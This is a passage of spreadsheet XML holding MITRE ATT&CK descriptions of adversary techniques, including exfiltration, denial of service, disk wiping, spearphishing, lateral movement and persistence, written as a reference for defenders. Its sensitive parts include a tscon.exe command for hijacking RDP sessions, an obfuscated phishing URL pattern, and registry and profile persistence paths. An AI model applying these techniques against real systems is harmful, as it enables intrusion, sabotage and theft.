Many cloud-based environments also support traffic mirroring. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual Network TAP)
Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.(Citation: copy_cmd_cisco)
Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. </t>
  </si>
  <si>
    <t>Adversaries may attempt to exfiltrate data over a USB connected physical device. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a USB device introduced by a user. The USB device could be used as the final exfiltration point or to hop between otherwise disconnected systems.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. 
Symmetric encryption algorithms are those that use shared or the same keys/secrets on each end of the channel. This requires an exchange or pre-arranged agreement/possession of the value used to encrypt and decrypt data. 
Network protocols that use asymmetric encryption often utilize symmetric encryption once keys are exchanged, but adversaries may opt to manually share keys and implement symmetric cryptographic algorithms (ex: RC4, AES) vice using mechanisms that are baked into a protocol. This may result in multiple layers of encryption (in protocols that are natively encrypted such as HTTPS) or encryption in protocols that not typically encrypted (such as HTTP or FTP). </t>
  </si>
  <si>
    <t>Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.
Different ways to achieve this exist, including TCP state-exhaustion attacks such as SYN floods and ACK floods.(Citation: Arbor AnnualDoSreport Jan 2018) With SYN floods, excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never completed. Because each OS has a maximum number of concurrent TCP connections that it will allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus preventing access to any TCP service provided by the server.(Citation: Cloudflare SynFlood)
ACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets are sent to the target. This forces the OS to search its state table for a related TCP connection that has already been established. Because the ACK packets are for connections that do not exist, the OS will have to search the entire state table to confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to eliminate the rogue ACK packets. This greatly reduces the resources available for providing the targeted service.(Citation: Corero SYN-ACKflood)</t>
  </si>
  <si>
    <t>Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
Adversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1546/001) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect.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</si>
  <si>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Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data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</si>
  <si>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Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism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</si>
  <si>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Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.
Botnets are commonly used to conduct network flooding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distributed DoS (DDoS), so many systems are used to generate the flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate the target network. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS flooding attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)</t>
  </si>
  <si>
    <t>Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network.
Reflection attacks often take advantage of protocols with larger responses than requests in order to amplify their traffic, commonly known as a Reflection Amplification attack. Adversaries may be able to generate an increase in volume of attack traffic that is several orders of magnitude greater than the requests sent to the amplifiers. The extent of this increase will depending upon many variables, such as the protocol in question, the technique used, and the amplifying servers that actually produce the amplification in attack volume. Two prominent protocols that have enabled Reflection Amplification Floods are DNS(Citation: Cloudflare DNSamplficationDoS) and NTP(Citation: Cloudflare NTPamplifciationDoS), though the use of several others in the wild have been documented.(Citation: Arbor AnnualDoSreport Jan 2018)  In particular, the memcache protocol showed itself to be a powerful protocol, with amplification sizes up to 51,200 times the requesting packet.(Citation: Cloudflare Memcrashed Feb 2018)</t>
  </si>
  <si>
    <t>An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. [External Defacement](https://attack.mitre.org/techniques/T1491/002) may ultimately cause users to distrust the systems and to question/discredit the system’s integrity. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.(Citation: FireEye Cyber Threats to Media Industries)(Citation: Kevin Mandia Statement to US Senate Committee on Intelligence)(Citation: Anonymous Hackers Deface Russian Govt Site) [External Defacement](https://attack.mitre.org/techniques/T1491/002) may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).(Citation: Trend Micro Deep Dive Into Defacement)</t>
  </si>
  <si>
    <t>An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the integrity of the systems. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster) Disturbing or offensive images may be used as a part of [Internal Defacement](https://attack.mitre.org/techniques/T1491/001) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware)</t>
  </si>
  <si>
    <t>Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.
Adversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have also been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk are erased instead of individual files.
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content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t>
  </si>
  <si>
    <t>Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources. 
Adversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) if all sectors of a disk are wiped.
On a network devices, adversaries may reformat the file system using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `format`.(Citation: format_cmd_cisco)
To maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other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t>
  </si>
  <si>
    <t>Adversaries may target resource intensive features of applications to cause a denial of service (DoS), denying availability to those applications. For example, specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself.(Citation: Arbor AnnualDoSreport Jan 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. (Citation: Sucuri BIND9 August 2015) Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent denial of service (DoS) condition.
Adversaries may exploit known or zero-day vulnerabilities to crash applications and/or systems, which may also lead to dependent applications and/or systems to be in a DoS condition. Crashed or restarted applications or systems may also have other effects such as [Data Destruction](https://attack.mitre.org/techniques/T1485), [Firmware Corruption](https://attack.mitre.org/techniques/T1495), [Service Stop](https://attack.mitre.org/techniques/T1489) etc. which may further cause a DoS condition and deny availability to critical information, applications and/or systems. </t>
  </si>
  <si>
    <t>Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.
One example of this type of attack is known as a simple HTTP flood, where an adversary sends a large number of HTTP requests to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.(Citation: Cloudflare HTTPflood)
Another variation, known as a SSL renegotiation attack, takes advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto algorithm. In a renegotiation attack, the adversary establishes a SSL/TLS connection and then proceeds to make a series of renegotiation requests. Because the cryptographic renegotiation has a meaningful cost in computation cycles, this can cause an impact to the availability of the service when done in volume.(Citation: Arbor SSLDoS April 2012)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.
Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018)(Citation: Command Five SK 2011)  </t>
  </si>
  <si>
    <t>Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. By modifying hardware or firmware in the supply chain, adversaries can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high degree of control over the system. Hardware backdoors may be inserted into various devices, such as servers, workstations, network infrastructure, or peripherals.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency.(Citation: Trendmicro NPM Compromise)  
Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. </t>
  </si>
  <si>
    <t>Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that is employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.
All forms of phishing are electronically delivered social engineering. In this scenario, adversaries are not directly sending malware to a victim vice relying on [User Execution](https://attack.mitre.org/techniques/T1204) for delivery and execution. For example, victims may receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools ([Remote Access Software](https://attack.mitre.org/techniques/T1219)) onto their computer.(Citation: Unit42 Luna Moth)
Adversaries may also combine voice phishing with [Multi-Factor Authentication Request Generation](https://attack.mitre.org/techniques/T1621) in order to trick users into divulging MFA credentials or accepting authentication prompts.(Citation: Proofpoint Vishing)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems.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 Spearphishing may also involve social engineering techniques, such as posing as a trusted source.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 </t>
  </si>
  <si>
    <t>Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. 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 Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place.
Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly. Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an "IDN homograph attack").(Citation: CISA IDN ST05-016) URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an “@” symbol: for example, `hxxp://google.com@1157586937`.(Citation: Mandiant URL Obfuscation 2023)
Adversaries may also utilize links to perform consent phishing, typically with OAuth 2.0 request URLs that when accepted by the user provide permissions/access for malicious applications, allowing adversaries to  [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: Trend Micro Pawn Storm OAuth 2017) These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls. (Citation: Microsoft OAuth 2.0 Consent Phishing 2021)</t>
  </si>
  <si>
    <t>Adversaries may send spearphishing messages via third-party services in an attempt to gain access to victim systems. Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels. 
All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that's running in an environment. The adversary can then send malicious links or attachments through these services.
A common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it's something they were expecting. If the payload doesn't work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.
SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may log into accessible cloud services within a compromised environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078) that are synchronized with or federated to on-premises user identities. The adversary may then perform management actions or access cloud-hosted resources as the logged-on user. 
Many enterprises federate centrally managed user identities to cloud services, allowing users to login with their domain credentials in order to access the cloud control plane. Similarly, adversaries may connect to available cloud services through the web console or through the cloud command line interface (CLI) (e.g., [Cloud API](https://attack.mitre.org/techniques/T1059/009)), using commands such as &lt;code&gt;Connect-AZAccount&lt;/code&gt; for Azure PowerShell, &lt;code&gt;Connect-MgGraph&lt;/code&gt; for Microsoft Graph PowerShell, and &lt;code&gt;gcloud auth login&lt;/code&gt; for the Google Cloud CLI.
In some cases, adversaries may be able to authenticate to these services via [Application Access Token](https://attack.mitre.org/techniques/T1550/001) instead of a username and password. </t>
  </si>
  <si>
    <t>Adversaries may hijack a legitimate user’s remote desktop session to move laterally within an environment.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perform RDP session hijacking which involves stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal their session. With System permissions and using Terminal Services Console, `c:\windows\system32\tscon.exe [session number to be stolen]`, an adversary can hijack a session without the need for credentials or prompts to the user.(Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions.(Citation: RDP Hijacking Medium) It can also lead to [Remote System Discovery](https://attack.mitre.org/techniques/T1018) and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in red teaming tools.(Citation: Kali Redsnarf)</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.
The Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM)
Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL)
Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document. DCOM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). (Citation: MSDN WMI)</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014) WinRM  can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).(Citation: MSDN WMI)</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.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Features](https://attack.mitre.org/techniques/T1546/008) or [Terminal Services DLL](https://attack.mitre.org/techniques/T1505/005) for Persistence.(Citation: Alperovitch Malware)</t>
  </si>
  <si>
    <t>Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.
In order to move laterally from a compromised host, adversaries may take advantage of trust relationships established with other systems via public key authentication in active SSH sessions by hijacking an existing connection to another system. This may occur through compromising the SSH agent itself or by having access to the agent's socket. If an adversary is able to obtain root access, then hijacking SSH sessions is likely trivial.(Citation: Slideshare Abusing SSH)(Citation: SSHjack Blackhat)(Citation: Clockwork SSH Agent Hijacking)(Citation: Breach Post-mortem SSH Hijack)
[SSH Hijacking](https://attack.mitre.org/techniques/T1563/001) differs from use of [SSH](https://attack.mitre.org/techniques/T1021/004) because it hijacks an existing SSH session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).</t>
  </si>
  <si>
    <t>Adversaries may leverage [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log directly into accessible cloud hosted compute infrastructure through cloud native methods. Many cloud providers offer interactive connections to virtual infrastructure that can be accessed through the [Cloud API](https://attack.mitre.org/techniques/T1059/009), such as Azure Serial Console(Citation: Azure Serial Console), AWS EC2 Instance Connect(Citation: EC2 Instance Connect)(Citation: lucr-3: Getting SaaS-y in the cloud), and AWS System Manager.(Citation: AWS System Manager).
Methods of authentication for these connections can include passwords, application access tokens, or SSH keys. These cloud native methods may, by default, allow for privileged access on the host with SYSTEM or root level access. 
Adversaries may utilize these cloud native methods to directly access virtual infrastructure and pivot through an environment.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console) These connections typically provide direct console access to the VM rather than the execution of scripts (i.e., [Cloud Administration Command](https://attack.mitre.org/techniques/T1651)).</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.
SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.
Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and patch levels.(Citation: Microsoft Admin Shares)</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC).  VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)
VNC differs from [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) as VNC is screen-sharing software rather than resource-sharing software. By default, VNC uses the system's authentication, but it can be configured to use credentials specific to VNC.(Citation: MacOS VNC software for Remote Desktop)(Citation: VNC Authentication)
Adversaries may abuse VNC to perform malicious actions as the logged-on user such as opening documents, downloading files, and running arbitrary commands. An adversary could use VNC to remotely control and monitor a system to collect data and information to pivot to other systems within the network. Specific VNC libraries/implementations have also been susceptible to brute force attacks and memory usage exploitation.(Citation: Hijacking VNC)(Citation: macOS root VNC login without authentication)(Citation: VNC Vulnerabilities)(Citation: Offensive Security VNC Authentication Check)(Citation: Attacking VNC Servers PentestLab)(Citation: Havana authentication bug)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use a Login Hook to establish persistence executed upon user logon. A login hook is a plist file that points to a specific script to execute with root privileges upon user logon. The plist file is located in the &lt;code&gt;/Library/Preferences/com.apple.loginwindow.plist&lt;/code&gt; file and can be modified using the &lt;code&gt;defaults&lt;/code&gt; command-line utility. This behavior is the same for logout hooks where a script can be executed upon user logout. All hooks require administrator permissions to modify or create hooks.(Citation: Login Scripts Apple Dev)(Citation: LoginWindowScripts Apple Dev) 
Adversaries can add or insert a path to a malicious script in the &lt;code&gt;com.apple.loginwindow.plist&lt;/code&gt; file, using the &lt;code&gt;LoginHook&lt;/code&gt; or &lt;code&gt;LogoutHook&lt;/code&gt; key-value pair. The malicious script is executed upon the next user login. If a login hook already exists, adversaries can add additional commands to an existing login hook. There can be only one login and logout hook on a system at a time.(Citation: S1 macOs Persistence)(Citation: Wardle Persistence Chapter)
**Note:** Login hooks were deprecated in 10.11 version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) </t>
  </si>
  <si>
    <t>Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The &lt;code&gt;trap&lt;/code&gt; command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like &lt;code&gt;ctrl+c&lt;/code&gt; and &lt;code&gt;ctrl+d&lt;/code&gt;.
Adversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism. Trap commands are of the following format &lt;code&gt;trap 'command list' signals&lt;/code&gt; where "command list" will be executed when "signals" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements)</t>
  </si>
  <si>
    <t>Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. A PowerShell profile  (&lt;code&gt;profile.ps1&lt;/code&gt;) is a script that runs when [PowerShell](https://attack.mitre.org/techniques/T1059/001) starts and can be used as a logon script to customize user environments.
[PowerShell](https://attack.mitre.org/techniques/T1059/001) supports several profiles depending on the user or host program. For example, there can be different profiles for [PowerShell](https://attack.mitre.org/techniques/T1059/001) host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. (Citation: Microsoft About Profiles) 
Adversaries may modify these profiles to include arbitrary commands, functions, modules, and/or [PowerShell](https://attack.mitre.org/techniques/T1059/001) drives to gain persistence. Every time a user opens a [PowerShell](https://attack.mitre.org/techniques/T1059/001) session the modified script will be executed unless the &lt;code&gt;-NoProfile&lt;/code&gt; flag is used when it is launched. (Citation: ESET Turla PowerShell May 2019) 
An adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator. (Citation: Wits End and Shady PowerShell Profiles)</t>
  </si>
  <si>
    <t>Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Adversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API. 
Adversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex: `.sys`) to disk, the payload can be loaded and registered via [Native API](https://attack.mitre.org/techniques/T1106) functions such as `CreateServiceW()` (or manually via functions such as `ZwLoadDriver()` and `ZwSetValueKey()`), by creating the required service Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)), or by using command-line utilities such as `PnPUtil.exe`.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Unit42 AcidBox June 2020) Adversaries may leverage these drivers as [Rootkit](https://attack.mitre.org/techniques/T1014)s to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as "Bring Your Own Vulnerable Driver" (BYOVD)) as part of [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020)
Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). To make detection analysis more challenging, malicious services may also incorporate [Masquerade Task or Service](https://attack.mitre.org/techniques/T1036/004) (ex: using a service and/or payload name related to a legitimate OS or benign software component).</t>
  </si>
  <si>
    <t>Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at &lt;code&gt;HKLM\SOFTWARE\Microsoft\Netsh&lt;/code&gt;.
Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)</t>
  </si>
  <si>
    <t>Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. 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as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
